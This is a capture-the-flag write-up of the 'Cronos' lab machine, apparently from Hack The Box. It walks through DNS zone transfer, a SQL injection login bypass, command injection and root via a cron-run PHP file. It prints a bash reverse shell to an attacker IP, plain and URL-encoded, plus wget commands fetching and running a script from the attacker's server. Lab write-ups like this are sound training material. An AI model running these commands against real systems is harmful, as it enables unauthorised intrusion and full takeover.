This is a writeup of the Cronos machine, which is rated medium difficulty.
Enumeration
nmap finds 3 open ports: 22 (SSH), 53 (DNS) and 80 (HTTP).
When I go to 10.10.10.13 in the browser, I see the Apache default page.
I try to find any pages with gobuster, but it doesn’t find anything.
It might be the case that I have to access the host by a domain name rather than its IP.
nslookup finds the ns1.cronos.htb domain.
I learned about DNS zone transfers in the Footprint module. Since port 53 is open, I try to find other domains. There is additionally an admin.cronos.htb domain.
Now I add these domains to the /etc/hosts file so that they resolve:
10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb
When I go to the cronos.htb page, there is a website, but nothing special. gobuster doesn’t find any pages here, either.
Now it’s time to go to the admin.cronos.htb page. There is a login page, which can be the initial foothold.
User Flag
As a first attempt, I try a basic SQL injection. Surprisingly, it works. There is a page where I can execute the traceroute command.
But when I click the execute! button, it doesn’t show anything.
Now it’s time to use Burp Suite. I try changing the command parameter and making the host parameter empty.
It returns a file list. So this endpoint has a command injection vulnerability: I can execute shell commands by changing the request parameter.
It’s time to get a reverse shell. I use the command below; 10.10.16.2 is my machine’s IP address.
/bin/bash -i >& /dev/tcp/10.10.16.2/1234 0>&1
In order to execute the reverse shell command, it needs to be URL-encoded like this:
%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.2%2F1234%200%3E%261%0A
I get the reverse shell!
The shell has no TTY, so I spawn a TTY shell. The details about shell spawning are written here.
I’m the www-data user, but I can read user.txt.
Privilege Escalation
To find any hints for privilege escalation, I use linpeas.sh.
I run a Python HTTP server on my machine in the directory where linpeas.sh is:
python3 -m http.server 80
Then I download and execute it on the target machine:
wget http://10.10.16.2/linpeas.sh
chmod +x linpeas.sh
bash linpeas.sh
linpeas.sh finds a cron job that executes the artisan file as the root user. This cron job runs every minute.
The artisan file is a PHP script, so by replacing it with a PHP reverse shell, I can get a root shell.
I download php-reverse-shell.php on my machine and change $ip to my machine’s IP and $port to 9999.
Now I download the PHP reverse shell on the target machine and rename it to artisan.
When the cron job executes the artisan file, I get a root shell!